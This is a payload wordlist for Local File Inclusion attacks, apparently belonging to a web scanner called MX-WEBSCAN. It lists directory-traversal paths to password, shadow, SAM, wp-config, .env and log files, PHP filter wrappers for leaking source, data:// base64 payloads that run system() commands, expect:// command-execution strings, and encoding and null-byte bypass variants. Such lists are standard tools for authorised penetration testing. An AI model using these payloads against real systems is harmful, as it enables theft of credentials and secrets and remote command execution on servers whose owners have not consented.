# Local File Inclusion Payloads - MX-WEBSCAN
# Hecho en México 🇲🇽

# Linux/Unix Files
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
....//....//....//etc/passwd
..;/..;/..;/etc/passwd
../../../../etc/shadow
../../../etc/shadow
../../etc/shadow
../etc/shadow
../../../../etc/group
../../../etc/group
../../etc/group
../etc/group
../../../../etc/hosts
../../../etc/hosts
../../etc/hosts
../etc/hosts
../../../../etc/hostname
../../../etc/hostname
../../etc/hostname
../etc/hostname
../../../../etc/issue
../../../etc/issue
../../etc/issue
../etc/issue
../../../../etc/motd
../../../etc/motd
../../etc/motd
../etc/motd
../../../../etc/profile
../../../etc/profile
../../etc/profile
../etc/profile
../../../../etc/bashrc
../../../etc/bashrc
../../etc/bashrc
../etc/bashrc
../../../../etc/shells
../../../etc/shells
../../etc/shells
../etc/shells
../../../../etc/sudoers
../../../etc/sudoers
../../etc/sudoers
../etc/sudoers
../../../../etc/fstab
../../../etc/fstab
../../etc/fstab
../etc/fstab
../../../../etc/mtab
../../../etc/mtab
../../etc/mtab
../etc/mtab
../../../../etc/crontab
../../../etc/crontab
../../etc/crontab
../etc/crontab
../../../../etc/aliases
../../../etc/aliases
../../etc/aliases
../etc/aliases
../../../../etc/ssh/sshd_config
../../../etc/ssh/sshd_config
../../etc/ssh/sshd_config
../etc/ssh/sshd_config
../../../../etc/my.cnf
../../../etc/my.cnf
../../etc/my.cnf
../etc/my.cnf
../../../../etc/php.ini
../../../etc/php.ini
../../etc/php.ini
../etc/php.ini
../../../../etc/httpd/conf/httpd.conf
../../../etc/httpd/conf/httpd.conf
../../etc/httpd/conf/httpd.conf
../etc/httpd/conf/httpd.conf
../../../../etc/apache2/apache2.conf
../../../etc/apache2/apache2.conf
../../etc/apache2/apache2.conf
../etc/apache2/apache2.conf
../../../../etc/nginx/nginx.conf
../../../etc/nginx/nginx.conf
../../etc/nginx/nginx.conf
../etc/nginx/nginx.conf

# Windows Files
../../../../windows/win.ini
../../../windows/win.ini
../../windows/win.ini
../windows/win.ini
..\..\..\windows\win.ini
..\..\windows\win.ini
..\windows\win.ini
../../../../windows/system32/drivers/etc/hosts
../../../windows/system32/drivers/etc/hosts
../../windows/system32/drivers/etc/hosts
../windows/system32/drivers/etc/hosts
../../../../boot.ini
../../../boot.ini
../../boot.ini
../boot.ini
../../../../windows/repair/sam
../../../windows/repair/sam
../../windows/repair/sam
../windows/repair/sam
../../../../windows/repair/system
../../../windows/repair/system
../../windows/repair/system
../windows/repair/system
../../../../windows/system32/config/sam
../../../windows/system32/config/sam
../../windows/system32/config/sam
../windows/system32/config/sam
../../../../windows/system32/config/system
../../../windows/system32/config/system
../../windows/system32/config/system
../windows/system32/config/system
../../../../windows/system32/config/software
../../../windows/system32/config/software
../../windows/system32/config/software
../windows/system32/config/software
../../../../windows/debug/NetSetup.log
../../../windows/debug/NetSetup.log
../../windows/debug/NetSetup.log
../windows/debug/NetSetup.log
../../../../windows/Panther/unattend.xml
../../../windows/Panther/unattend.xml
../../windows/Panther/unattend.xml
../windows/Panther/unattend.xml
../../../../windows/system32/inetsrv/config/schema/ASPNET_schema.xml
../../../windows/system32/inetsrv/config/schema/ASPNET_schema.xml
../../windows/system32/inetsrv/config/schema/ASPNET_schema.xml
../windows/system32/inetsrv/config/schema/ASPNET_schema.xml
../../../../windows/system32/inetsrv/config/applicationHost.config
../../../windows/system32/inetsrv/config/applicationHost.config
../../windows/system32/inetsrv/config/applicationHost.config
../windows/system32/inetsrv/config/applicationHost.config

# Web Files
../../../../index.php
../../../index.php
../../index.php
../index.php
../../../../config.php
../../../config.php
../../config.php
../config.php
../../../../configuration.php
../../../configuration.php
../../configuration.php
../configuration.php
../../../../wp-config.php
../../../wp-config.php
../../wp-config.php
../wp-config.php
../../../../wp-config.php.bak
../../../wp-config.php.bak
../../wp-config.php.bak
../wp-config.php.bak
../../../../.htaccess
../../../.htaccess
../../.htaccess
../.htaccess
../../../../.env
../../../.env
../../.env
../.env
../../../../.git/config
../../../.git/config
../../.git/config
../.git/config
../../../../.git/index
../../../.git/index
../../.git/index
../.git/index
../../../../.git/HEAD
../../../.git/HEAD
../../.git/HEAD
../.git/HEAD
../../../../.svn/entries
../../../.svn/entries
../../.svn/entries
../.svn/entries
../../../../.svn/wc.db
../../../.svn/wc.db
../../.svn/wc.db
../.svn/wc.db
../../../../web.config
../../../web.config
../../web.config
../web.config
../../../../robots.txt
../../../robots.txt
../../robots.txt
../robots.txt
../../../../sitemap.xml
../../../sitemap.xml
../../sitemap.xml
../sitemap.xml
../../../../crossdomain.xml
../../../crossdomain.xml
../../crossdomain.xml
../crossdomain.xml
../../../../clientaccesspolicy.xml
../../../clientaccesspolicy.xml
../../clientaccesspolicy.xml
../clientaccesspolicy.xml

# Log Files
../../../../var/log/apache2/access.log
../../../var/log/apache2/access.log
../../var/log/apache2/access.log
../var/log/apache2/access.log
../../../../var/log/apache2/error.log
../../../var/log/apache2/error.log
../../var/log/apache2/error.log
../var/log/apache2/error.log
../../../../var/log/httpd/access_log
../../../var/log/httpd/access_log
../../var/log/httpd/access_log
../var/log/httpd/access_log
../../../../var/log/httpd/error_log
../../../var/log/httpd/error_log
../../var/log/httpd/error_log
../var/log/httpd/error_log
../../../../var/log/nginx/access.log
../../../var/log/nginx/access.log
../../var/log/nginx/access.log
../var/log/nginx/access.log
../../../../var/log/nginx/error.log
../../../var/log/nginx/error.log
../../var/log/nginx/error.log
../var/log/nginx/error.log
../../../../var/log/messages
../../../var/log/messages
../../var/log/messages
../var/log/messages
../../../../var/log/syslog
../../../var/log/syslog
../../var/log/syslog
../var/log/syslog
../../../../var/log/auth.log
../../../var/log/auth.log
../../var/log/auth.log
../var/log/auth.log
../../../../var/log/secure
../../../var/log/secure
../../var/log/secure
../var/log/secure
../../../../var/log/maillog
../../../var/log/maillog
../../var/log/maillog
../var/log/maillog
../../../../var/log/mysql/mysql.log
../../../var/log/mysql/mysql.log
../../var/log/mysql/mysql.log
../var/log/mysql/mysql.log
../../../../var/log/mysql/error.log
../../../var/log/mysql/error.log
../../var/log/mysql/error.log
../var/log/mysql/error.log
../../../../var/log/postgresql/postgresql.log
../../../var/log/postgresql/postgresql.log
../../var/log/postgresql/postgresql.log
../var/log/postgresql/postgresql.log

# Proc Files
../../../../proc/self/environ
../../../proc/self/environ
../../proc/self/environ
../proc/self/environ
../../../../proc/self/cmdline
../../../proc/self/cmdline
../../proc/self/cmdline
../proc/self/cmdline
../../../../proc/self/fd/0
../../../proc/self/fd/0
../../proc/self/fd/0
../proc/self/fd/0
../../../../proc/self/fd/1
../../../proc/self/fd/1
../../proc/self/fd/1
../proc/self/fd/1
../../../../proc/self/fd/2
../../../proc/self/fd/2
../../proc/self/fd/2
../proc/self/fd/2
../../../../proc/self/fd/3
../../../proc/self/fd/3
../../proc/self/fd/3
../proc/self/fd/3
../../../../proc/self/fd/4
../../../proc/self/fd/4
../../proc/self/fd/4
../proc/self/fd/4
../../../../proc/self/fd/5
../../../proc/self/fd/5
../../proc/self/fd/5
../proc/self/fd/5
../../../../proc/self/fd/6
../../../proc/self/fd/6
../../proc/self/fd/6
../proc/self/fd/6
../../../../proc/self/fd/7
../../../proc/self/fd/7
../../proc/self/fd/7
../proc/self/fd/7
../../../../proc/self/fd/8
../../../proc/self/fd/8
../../proc/self/fd/8
../proc/self/fd/8
../../../../proc/self/fd/9
../../../proc/self/fd/9
../../proc/self/fd/9
../proc/self/fd/9
../../../../proc/self/fd/10
../../../proc/self/fd/10
../../proc/self/fd/10
../proc/self/fd/10
../../../../proc/self/cwd/index.php
../../../proc/self/cwd/index.php
../../proc/self/cwd/index.php
../proc/self/cwd/index.php
../../../../proc/self/root/etc/passwd
../../../proc/self/root/etc/passwd
../../proc/self/root/etc/passwd
../proc/self/root/etc/passwd
../../../../proc/self/root/etc/hosts
../../../proc/self/root/etc/hosts
../../proc/self/root/etc/hosts
../proc/self/root/etc/hosts

# PHP Wrappers
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../etc/passwd
php://filter/convert.base64-encode/resource=../../etc/passwd
php://filter/convert.base64-encode/resource=../etc/passwd
php://filter/read=string.rot13/resource=index.php
php://filter/read=string.toupper/resource=index.php
php://filter/read=string.tolower/resource=index.php
php://filter/read=convert.iconv.utf-8.utf-16/resource=index.php
php://filter/read=convert.iconv.utf-8.utf-7/resource=index.php
php://input
php://fd/0
php://memory
php://temp
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
php://filter/zlib.inflate/resource=index.php
php://filter/convert.quoted-printable-encode/resource=index.php

# Data Wrapper
data://text/plain,<?php%20echo%20system('ls');?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8+
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+
data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9wYXNzd2QnKTs/Pg==
data://text/plain;base64,PD9waHAgc3lzdGVtKCdscyAtbGEnKTs/Pg==
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
data://text/plain;base64,PD9waHAgZWNobyAnSEFDS0VEJzs/Pg==

# Expect Wrapper
expect://ls
expect://id
expect://whoami
expect://pwd
expect://cat /etc/passwd
expect://uname -a
expect://ifconfig
expect://netstat -an

# File URIs
file:///etc/passwd
file:///etc/hosts
file:///etc/hostname
file:///var/www/html/index.php
file:///C:/windows/win.ini
file:///C:/boot.ini
file:///C:/windows/system32/drivers/etc/hosts

# Path Truncation
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
../../../../etc/passwd%00
../../../../etc/passwd%2500
../../../../etc/passwd%00index.php
../../../../etc/passwd%20
../../../../etc/passwd
../../../../etc/passwd/./././././.
../../../../etc/passwd/./
../../../../etc/passwd/../passwd
../../../../etc/passwd//////
../../../../etc//passwd
../../../../etc/./passwd
../../../../etc/../etc/passwd

# Double Encoding
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fhosts
..%252f..%252f..%252fwindows%252fwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini

# URL Encoding
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fhosts
..%2f..%2f..%2fwindows%2fwin.ini
..%5c..%5c..%5cwindows%5cwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# Unicode Encoding
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
..%e0%80%af..%e0%80%af..%e0%80%afetc%passwd

# Null Bytes
../../../../etc/passwd%00
../../../../etc/passwd%00.jpg
../../../../etc/passwd%00.png
../../../../etc/passwd%00.gif
../../../../etc/passwd%00.pdf
../../../../etc/passwd%00.txt
../../../../etc/passwd%00.html
../../../../etc/passwd%00.php
../../../../etc/passwd%2500

# Path Traversal with Extra Slashes
....//....//....//etc/passwd
....//....//....//etc/hosts
....//....//....//windows/win.ini
....\/....\/....\/windows/win.ini
..//..//..//etc/passwd
..//..//..//etc/hosts
..//..//..//windows/win.ini
.//.//.//etc/passwd
.//.//.//etc/hosts

# Nested Traversal
..;/..;/..;/etc/passwd
..;/..;/..;/etc/hosts
..;/..;/..;/windows/win.ini
..;\\..;\\..;\\windows\\win.ini
..;//..;//..;//etc/passwd
